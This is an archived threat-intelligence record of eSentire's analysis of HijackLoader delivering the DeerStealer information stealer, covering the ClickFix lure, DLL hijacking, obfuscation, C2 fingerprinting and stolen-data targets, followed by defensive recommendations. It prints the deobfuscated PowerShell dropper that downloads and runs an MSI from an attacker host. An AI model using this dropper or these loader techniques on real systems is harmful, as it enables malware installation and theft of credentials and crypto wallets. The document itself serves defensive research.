{ "id": "419f94cb-1a7d-4a5b-a979-8976caf7f79c", "created_at": "2026-04-06T00:12:40.538249Z", "updated_at": "2026-04-10T13:11:54.791355Z", "deleted_at": null, "sha1_hash": "c21631840d82b4ce1c76b63c154748ab3013bffc", "title": "Don't Get Caught in the Headlights - DeerStealer Analysis", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2699894, "plain_text": "Don't Get Caught in the Headlights - DeerStealer Analysis\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 23:15:17 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nThroughout May 2025, eSentire's Threat Response Unit (TRU) detected several attempts by threat actors to\r\ndownload and execute HijackLoader. Many of these attempts involved the attempted deployment of DeerStealer\r\nAKA XFiles as the final payload, a sophisticated information stealer being sold on dark-web hacking forums by\r\nthe user “LuciferXfiles”.\r\nKey components in observed attack chains involve the use of the ClickFix initial access method, where victims\r\nare redirected to a phishing page prompting the user to execute a malicious command in the Windows Run\r\nPrompt. Immediately following is the download and execution of HijackLoader, a malware loader that first\r\nemerged in 2023 and is known for its use of steganography for storage of malware configuration settings and\r\nmodules in an encrypted PNG image.\r\nThe final payload, known as “DeerStealer”, offers threat actors extensive capability to harvest crypto-currency\r\nwallets, instant messengers, VPNs, and browser cookies, passwords, credit cards, and autofill from victim\r\nmachines. The malware continues to evolve with planned features including MacOS support, AI integration, and\r\nautomated crypto balance checking.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 1 of 19\n\nFigure 1 – XFiles Spyware advertisement image on hacking forum\r\nKey Features\r\nBasic subscription tier includes DeerStealer, higher tiers include Hidden Spyware module\r\nHidden VNC capability for stealthy remote desktop control\r\nSecure communication via HTTP protocol with custom encryption\r\nProxy domain system (Gasket) to hide true server IP address and increase persistence\r\nPersonal server setup for each client\r\nBrowser-based control panel supporting multi-bot management and team collaboration\r\nCore Functionalities\r\nProcess management\r\nRemote command execution\r\nMass bot control options\r\nHidden VNC with up to 30 FPS\r\nCryptocurrency Features\r\nExtensive “clipper” (clipboard hijacking) functionality supporting 14+ cryptocurrency types\r\nCollection of 800+ browser crypto wallet extensions, with ability for threat actors to add custom extension\r\ntargets\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 2 of 19\n\nDesktop and USB crypto wallet targeting\r\nData Collection\r\nLive keylogging\r\nBrowser data harvesting (cookies, passwords, autofill, cards)\r\nMessenger, FTP, VPN, and gaming client data\r\nEmail client and password manager targeting\r\nAttack Chain\r\nThe attack chain is described in the figure below. Initial access begins when the victim runs an encoded\r\nPowerShell command from a ClickFix page in a Run prompt.\r\nThis command downloads and executes a Microsoft Installer (MSI) named “now.msi”. This installer copies\r\nseveral files into C:\\ProgramData and proceeds to execute the legitimate and signed COMODO Internet Security\r\nbinary (EngineX_Co64.exe).\r\nThough this file isn’t malicious by itself and normally loads a signed DLL “cmdres.dll” in the same directory, but\r\nin this case, it is seen instead loading an unsigned version of cmdres.dll. Further investigation reveals this DLL has\r\na hook installed in the CRT that redirects control flow to the first stage of the attack which is shown later in the\r\nblog.\r\nFigure 2 – ClickFix initial access\r\nThe contents of the decrypted/deobfuscated PowerShell can be seen below, showing how the LOLBin curl.exe is\r\nused to download the HijackLoader dropper MSI and execute it via msiexec.exe.\r\n$AqEVu = $env:AppData;\r\nfunction kWERDs($EIpoJdP, $wQmPq){curl $EIpoJdP -o $wQmPq};\r\nfunction zPWQQKzb($CAvStqT){kWERDs $CAvStqT $wQmPq}\r\n$wQmPq = $env:AppData + '\\now.msi';\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 3 of 19\n\nzPWQQKzb \"hxxps://luckyseaworld[.]com/now.msi\";\r\nmsiexec.exe /i $wQmPq;;\r\nFigure 3 – Deobfuscated PowerShell dropper contents\r\nFigure 4 – Attack chain diagram\r\nHijackLoader Analysis\r\nOn the left side of the figure below, the legitimate and signed disassembly of cmdres.dll can be seen, which calls\r\n__scrt_initialize_crt – a legitimate function responsible for initializing the C runtime (CRT).\r\nOn the right-hand side of the figure, however we can see a patch has been applied to hook and redirect execution\r\nelsewhere.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 4 of 19\n\nFigure 5 – Patched CRT in cmdres.dll\r\nAfter hijacking control flow, the purpose of this stage is to resolve APIs and read/decrypt the next stage. APIs are\r\nresolved dynamically by enumerating the exports of kernel32 and comparing each export name to pre-computed\r\nhashes.\r\nThe hashing routine itself iterates over each export name and multiplies each byte by 2 and bitwise ANDs the\r\nresult. The following python code can be used to simulate this hashing technique.\r\nIn order to ease the analysis process, we created a python script available here to resolve hashes to their\r\ncorresponding API and set comments in IDA Pro.\r\ndefcustom_hash(constant: int, export_name: str) -\u003e int:\r\n hash_value =0x00000000\r\n for char in export_name:\r\n hash_value = (ord(char) + (constant *2)) \u00260xFFFFFFFF\r\n constant = hash_value\r\n return hash_value\r\nFigure 6 – Hashing algorithm pseudo-code\r\nThe following APIs are resolved and are used in the process of reading/decrypting the next stage and module\r\nstomping the legitimate binary vssapi.dll (LoadLibraryA and VirtualProtect).\r\nNote, original permissions are restored via VirtualProtect following the module stomping process.\r\nFatalAppExitW\r\nLocalAlloc\r\nSetCurrentDirectoryW\r\nGetModuleFileNameW\r\nCreateFileA\r\nGetFileSize\r\nReadFile\r\nLoadLibraryA\r\nVirtualProtect\r\nCmdres.dll contains a constant that is used as an offset to the beginning of a header in Bairrout.xd. This header\r\nbegins with a DWORD that contains the size of the ciphertext. The next DWORD in the header is used for\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 5 of 19\n\ndecrypting the ciphertext by iterating over every four bytes of the ciphertext and adding to this constant until the\r\nend of the ciphertext, replacing every four bytes.\r\nThe basic block responsible for reading Bairrout.xd via ReadFile, navigating to the header of the file via hard-coded offset, and decryption can be seen in the figure below.\r\nTo ease the analysis process, we created an IDA python based script to automate this behavior and dump the\r\ndecrypted shellcode, available here.\r\nFigure 7 – Basic blocks that decrypt next stage\r\nThe figure below displays the contents of Bairrout.xd at the aforementioned offset, which contains the 8- byte file\r\nheader, which is composed of the ciphertext size and key. The remaining bytes are the ciphertext.\r\nFigure 8 – Annotated hex view of encrypted next stage\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 6 of 19\n\nThe purpose of the next stage is to module stomp the legitimate binary input.dll with core HijackLoader shellcode.\r\nThe inject process (legitimate signed Q-Dir renamed as SecureLoader_test.exe) is then started in a suspended\r\nstate, the HijackLoader configuration is decrypted/parsed from Kleanmean.py, and the DeerStealer payload is\r\nwritten to a new section in the inject process.\r\nFinally, the legitimate binary d3d9.dll is module stomped with shellcode which serves to resume the inject\r\nprocess. The extraction of all modules and configuration data from the Kleanmean.py file is achievable through\r\nZScaler's HijackLoader configuration extractor, which is detailed in the blog available here.\r\nDespite this extractor being publicly available for approximately one year, the threat actors responsible for\r\nHijackLoader appear either unaware of or indifferent to its existence. The configuration extractor's output is\r\nillustrated in the figure below.\r\nIt is worth noting that our analysis of the extracted samples has not revealed any new HijackLoader modules.\r\nFigure 9 – Stdout of HijackLoader configuration extractor\r\nDeerStealer Analysis\r\nDeerStealer is a sophisticated information stealer sold by the user @LuciferXfiles on dark-web hacking forums. It\r\nis called DeerStealer by LuciferXfiles himself, though he also refers to the full package with the loader as “XFiles\r\nSpyware”.\r\nPricing is based around a tiered subscription- based model starting at $200 per month for “Premium”, $450 per\r\nmonth for “Thief”, $1500 per month for “Thief+”, and $3000 per month for “Professional”.\r\nThreat actors that purchase higher tier subscriptions gain access to custom ClickFix scripts, “recrypt” or re-packing of the payload, EV signing, and other features.\r\nControl Flow Obfuscation\r\nDeerStealer employs a significant amount of obfuscation, in order to hinder the analysis process and evade\r\nantivirus signatures. The builder for DeerStealer produces payloads that have around 50% similarity when\r\ncompared against one another.\r\nThis involves using assembly obfuscation techniques where basic blocks contain “junk” operations, such as bogus\r\nfunction calls, bogus operations on registers, etc. This effectively masks the true control flow and makes static\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 7 of 19\n\nanalysis much more difficult.\r\nThe figure below displays the similarity rating (44%) between two routines that serve to decrypt the C2 proxy\r\nURL. This effectively demonstrates how control flow obfuscation plays a significant role in defeating static\r\nanalysis techniques.\r\nFigure 10 – Similarity between C2 URL decryption routines\r\nSimple Virtual Machines for String Decryption\r\nUnique jump-tables/simple virtual machines are used to decrypt the C2 URL and strings used throughout and due\r\nto control flow obfuscation understanding these virtual machines is made that much more difficult.\r\nIn analyzed variants, the virtual machine makes use of various bitwise operations, such as XOR, AND, etc. for\r\ndecryption. This decryption process is unique sample to sample.\r\nFigure 11 – Jumptable VM example used in decrypting C2 URL\r\nAutomating string decryption is challenging for these reasons, however by emulating the string decryption routine\r\nand creating yara rules to match various basic blocks, we successfully created a string decryption/config extraction\r\nscript available here. An example dump of decrypted strings we identified in our analysis can be found here.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 8 of 19\n\nFigure 12 – Simple obfuscation\r\nThe following figure shows output of the string decryption IDA python script for DeerStealer, which sets\r\ncomments where strings are referenced in the assembly. Note, be sure to check out the comments left at the top of\r\nthe script for instructions on usage.\r\nFigure 13 – IDA python script\r\nC2 Communication\r\nCommunication with the C2 proxy happens over HTTPS, where first the victim machine is fingerprinted, and an\r\nencrypted response is returned by the C2 containing the malware configuration. After a few successful responses\r\nfrom the C2 and retrieving it’s malware configuration, communication is one-way as described in the blog\r\npublished by Any.Run.\r\nSince the publishing of that blog, many improvements have been made to the C2 communication process and a\r\nsimple XOR over each byte is no longer used to encrypt request data.\r\nThe initial request to the C2 proxy contains several identifiers to fingerprint the victim machine, including the\r\nInstallDate, InstallTime, machine GUID from the registry keys below, and the machine’s processor name.\r\nSubsequent requests contain encrypted zip files containing harvested information. The name of the CPU is\r\nacquired via the CPUID instruction.\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\InstallTime\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\InstallDate\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\MachineGuid\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 9 of 19\n\nFigure 14 – Usage of CPUID instruction to retrieve processor name\r\nThe initial C2 request data contains data matching the following structure, though some of this data likely changes\r\nbetween samples.\r\ntypedefstruct {\r\nuint8_t processor_length; // Length of processor string\r\nchar* processor_string; // Processor string (variable length)\r\nuint16_t magic1; // Hard-coded \\xA0\\xCE\r\nuint32_t install_date; // 4 bytes installation date\r\nuint8_t magic2; // Hard-coded \\xCF\r\nuint64_t install_time; // 8 bytes installation time\r\nuint16_t magic3; // Hard-coded \\xD9\\x24\r\nuint8_thwid[36]; // 36 bytes machine GUID/HWID\r\nuint8_tpadding[16]; // 16 bytes of \\xFF\r\n};\r\nFigure 15 – Example structure of initial C2 check in\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 10 of 19\n\nFigure 16 – Annotated hex dump of initial C2 check in\r\nLog Structure\r\nStolen credentials and files are packaged in the following structure. This is what threat actors see when they\r\ndownload logs for a specific victim machine.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 11 of 19\n\nFigure 17 – Directory listing of exfiltrated credentials and data\r\nClipper\r\nDeerStealer allows threat actors to target the clipboard of victim machines for substitution of threat actor supplied\r\ncrypto-wallet addresses. The full list of currently supported crypto-wallet addresses are as follows.\r\nBitcoin Legacy and P2SH Addresses\r\nBitcoin Bech32 Addresses\r\nMonero (XMR)\r\nStellar (XLM)\r\nRipple (XRP)\r\nLitecoin (Legacy) (LTC)\r\nLitecoin (Bech32) (LTC)\r\nNeocoin (NEO)\r\nBitcoin Cash (Legacy and New)\r\nDashcoin (DASH)\r\nDogecoin (DOGE)\r\nBinance chain (BEP2)\r\nEthereum (ETH) (ERC-20) or (BEP-20)\r\nTRON (TRX) or TRC-20\r\nZcash (ZEC)\r\nThe figure below displays the “Clipper” section of the XFiles Spyware admin panel.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 12 of 19\n\nFigure 18 – Clipper administration panel menu\r\nBrowser Harvesting\r\nMore than 50+ web browsers are targeted by Deer Stealer where stored cookies, passwords, autofill, and credit\r\ncards are harvested. Cookies from Chromium based browsers are retrieved from memory following successful\r\ncommunications with the C2 server.\r\nThis involves starting a new instance Chromium based browsers with the following command lines as examples\r\nfor Microsoft Edge and Google Chrome.\r\n\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window\r\n\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --force-high-res-timeticks=disabled --always-read-main-dll --field-trial-handle=2948,i,15397448069048126570,5460957643742959585,262144 --variations-seed-version --\r\nmojo-platform-channel-handle=3436 /prefetch:11\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\"\r\n\"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--\r\ndatabase=C:\\Users\\User\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\" --\r\nurl=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --\r\nannotation=prod=Chrome --annotation=ver=137.0.7151.104 --initial-client-data=0x128,0x12c,0x130,0xa4,0x134,0x7ffea4049ce8,0x7ffea4049cf4,0x7ffea4049d00\r\nBrowser Extension Harvesting\r\nDeerStealer targets 800+ browser extensions, specifically targeting the following type of extensions. It is possible\r\nfor threat actors to specify custom extensions to target.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 13 of 19\n\nCrypto and NFT wallets\r\nPassword managers\r\n2FA/OTP/Authentication managers\r\nNotes\r\nThe figure below displays the “Analytics” section of the XFiles Spyware admin panel, showcasing how threat\r\nactors can retrieve statistics for stolen credentials.\r\nFigure 19 – Analytics administration panel menu\r\nDesktop-based Crypto-wallet Harvesting\r\nDeerStealer targets the following desktop-based crypto-wallets.\r\nArmory\r\nAtomic\r\nCoinomi\r\nBitcoin Core\r\nExodus\r\nJaxx Liberty\r\nGuarda\r\nEver Surf\r\nMonero Core\r\nElectrum\r\nDesktop-based Instant Messenger Harvesting\r\nFor now, DeerStealer only targets Discord and Telegram, though support for WhatsApp, Signal, Pidgin, RamBox,\r\nViber, Psi+Pidgin, tox, Matrix is planned.\r\nFTP Client Harvesting\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 14 of 19\n\nFor now, DeerStealer targets FileZilla and WinSCP, two of the more popular FTP clients, though there are plans\r\nfor it to also target CoreFTP, Snowflake, CyberDuck, FTP Navigator, FTPRush, FlashFXP, Smartftp,\r\nTotalCommander, Ws_ftp, and CoreFTP.\r\nVPN Client Harvesting\r\nFor now, DeerStealer targets OpenVPN and ProtonVPN, though support for WinscribeVPN, NordVPN,\r\nTurboVPN, VPN master, EarthVPN, AzireVPN, OpenVPN, and PrivateVPN_Global_AB is planned.\r\nGaming Client Harvesting\r\nFor now, DeerStealer targets Steam, however support for Origin, Battle.net, Mojang Session, Twitch, and OBS\r\nProfiles is planned.\r\nVNC Client Harvesting\r\nThe following VNC clients are targeted by DeerStealer.\r\nTightVNC\r\nTigerVNC\r\nRealVNC\r\nUltraVNC\r\nThe figure below displays how stolen wallets and VNC credentials are displayed in the administration panel,\r\noffering threat actors a preview of stolen logs.\r\nFigure 20 – Logs preview\r\nRemote Desktop Client Harvesting\r\nFor now, DeerStealer targets AnyDesk and Windows RDP, though support for TeamViewer is planned.\r\nRemote Desktop Client Harvesting\r\nFor now, DeerStealer targets Thunderbird and Outlook (New, Classic, and Office 2016 with password decryption),\r\nhowever support for Foxmail, EMClient, Mailbird, and Mailspring is planned.\r\nFile Grabber\r\nThrough the file grabber module, threat actors can retrieve files from victim machines by specifying rules, or in\r\nother words, paths and file extensions to exfiltrate. The figure below displays the FileGrabber menu entry in the\r\nadministration panel.\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 15 of 19\n\nFigure 21 – File Grabber menu in the administration panel\r\nSubscription Tiers\r\nAs previously mentioned, XFiles Spyware is sold through a subscription- based model, where each tier provides\r\nthreat actors with more advanced features/services.\r\nPremium ($200/month)\r\n24/7 Support\r\nPremium Matrix chat access\r\n20 user team limit\r\nWindows C++ Native Stub X64 (Stealer)\r\nManual access\r\nGoogle token recovery\r\nNon-resident Loader\r\nPublic gaskets access\r\nThief ($450/month)\r\nCrypt (Unique Stub)\r\nDefender Bypass\r\nHTML WIN+R (Run Prompt) ClickFix\r\nThief+ ($1500/month)\r\nWindows C++ Native Stub X64 (Hidden Spyware)\r\nHidden Spyware modules (HVNC, Clipper, Live Keylogger)\r\nProfessional ($3000/month)\r\nSmartscreen Bypass\r\nBrowser Alerts Bypass\r\nlnk crypt builder\r\nComplete Hidden Spyware functionality\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 16 of 19\n\nCommon Features Across All Tiers\r\n24/7 Support\r\nPremium Matrix chat\r\n20 user team limit\r\nManual access\r\nGoogle token recovery\r\nNon-resident Loader\r\nPublic gaskets access\r\nWhat can you learn from this TRU Positive?\r\nAnalysis reveals HijackLoader's use of DLL hijacking and module stomping techniques to deploy\r\nDeerStealer, showing how threat actors leverage legitimate signed binaries to evade detection.\r\nDeerStealer employs sophisticated obfuscation including control flow manipulation and virtual machines\r\nfor string decryption, with samples showing only 50% similarity to defeat static analysis.\r\nThe malware's C2 communication occurs over HTTPS and includes detailed victim fingerprinting using\r\nsystem identifiers, with subsequent communications containing encrypted stolen data.\r\nTRU provides defensive teams with detailed technical analysis, including IDA Pro scripts for string\r\ndecryption, configuration extraction tools, and C2 communication structure definitions.\r\nThe malware-as-a-service operates on a tiered subscription model ($200-$3000/month), with advanced\r\nfeatures like hidden VNC, clipper functionality, and browser alert bypasses restricted to higher-tier\r\ncustomers.\r\nRecommendations from the Threat Response Unit (TRU)\r\nDisable the Run Prompt via GPO:\r\nUser Configuration \u003e Administrative Templates \u003e Start Menu and Taskbar \u003e Enable “Remove Run\r\nmenu from Start Menu”\r\nEmploy email filtering and protection measures.\r\nUse a Next-Gen AV (NGAV) or Endpoint Detection and Response (EDR) solution to detect and contain\r\nthreats.\r\nImplement a Phishing and Security Awareness Training (PSAT) program that educates and informs your\r\nemployees.\r\nIndicators of Compromise\r\nIndicators of Compromise can be found here.\r\nReferences\r\nhttps://any.run/cybersecurity-blog/deerstealer-campaign-analysis/\r\nhttps://www.zscaler.com/blogs/security-research/hijackloader-updates\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 17 of 19\n\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 18 of 19\n\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nhttps://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.esentire.com/blog/dont-get-caught-in-the-headlights-deerstealer-analysis" ], "report_names": [ "dont-get-caught-in-the-headlights-deerstealer-analysis" ], "threat_actors": [ { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "f4f16213-7a22-4527-aecb-b964c64c2c46", "created_at": "2024-06-19T02:03:08.090932Z", "updated_at": "2026-04-10T02:00:03.6289Z", "deleted_at": null, "main_name": "GOLD NIAGARA", "aliases": [ "Calcium ", "Carbanak", "Carbon Spider ", "FIN7 ", "Navigator ", "Sangria Tempest ", "TelePort Crew " ], "source_name": "Secureworks:GOLD NIAGARA", "tools": [ "Bateleur", "Carbanak", "Cobalt Strike", "DICELOADER", "DRIFTPIN", "GGLDR", "GRIFFON", "JSSLoader", "Meterpreter", "OFFTRACK", "PILLOWMINT", "POWERTRASH", "SUPERSOFT", "TAKEOUT", "TinyMet" ], "source_id": "Secureworks", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434360, "ts_updated_at": 1775826714, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/c21631840d82b4ce1c76b63c154748ab3013bffc.pdf", "text": "https://archive.orkl.eu/c21631840d82b4ce1c76b63c154748ab3013bffc.txt", "img": "https://archive.orkl.eu/c21631840d82b4ce1c76b63c154748ab3013bffc.jpg" } }